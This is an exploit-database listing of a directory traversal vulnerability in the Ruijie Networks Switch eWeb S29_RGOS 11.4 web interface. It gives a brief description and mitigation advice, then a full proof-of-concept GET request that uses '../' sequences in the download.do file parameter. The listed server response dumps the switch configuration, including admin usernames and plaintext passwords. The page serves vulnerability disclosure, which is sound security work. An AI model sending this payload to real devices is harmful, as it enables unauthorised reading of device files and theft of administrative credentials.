Ruijie Networks Switch eWeb S29_RGOS 11.4 - Directory Traversal

vendor:

Switch eWeb

by:

Tuygun

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: Switch eWeb

Affected Version From: eWeb S29_RGOS 11.4(1)B12P11

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2020

Ruijie Networks Switch eWeb S29_RGOS 11.4 – Directory Traversal

This exploit allows an attacker to retrieve arbitrary files from the target system by exploiting a directory traversal vulnerability in Ruijie Networks Switch eWeb S29_RGOS 11.4. By sending a specially crafted GET request, an attacker can traverse directories and access sensitive files on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patch or update to a version that is not affected by this issue. Additionally, restrict access to the affected system and implement proper input validation to prevent directory traversal attacks.

Source

Exploit-DB raw data:

# Exploit Title: Ruijie Networks Switch eWeb S29_RGOS 11.4 - Directory Traversal
# Exploit Author: Tuygun
# Date: 2020-08-19
# Vendor Homepage:  https://www.ruijienetworks.com/
# Version: eWeb S29_RGOS 11.4(1)B12P11
# Source : https://faruktuygun.com/directorytraversal.html

Proof of Concept Request:

GET /download.do?file=../../../../config.text HTTP/1.1
Host: 192.168.2.160
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: LOCAL_LANG_COOKIE=en; UI_LOCAL_COOKIE=en; mac=0074.9c95.43f0;
SID=33BA8206DE5B8B8295C89A3C4787D7A; module=network; subModule=certify;
threeModule=certify_adv
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Wed, 03 Jun 2020 20:52.25 GMT
Server: HTTP-Server/1.1
Content-length: 2070
Content-Disposition: attachment; filename="config.text"
Content-Type: application/octet-stream; Charset=UTF-8

version S29_RGOS 11.4(1)B12P11
hostname OMURGA
!
no spanning-tree
!
username admin password admin
username ruijie  privilege 15                    201998

!
cwmp
!
install 0 S2910C-24GT2XS-HP-E
!
sysmac 0074.9C95.43f0
!
enable service web-server http
enable service web-server https
webmaster level 1 username ruijie password 201998
!
nfpp
!
.
.
.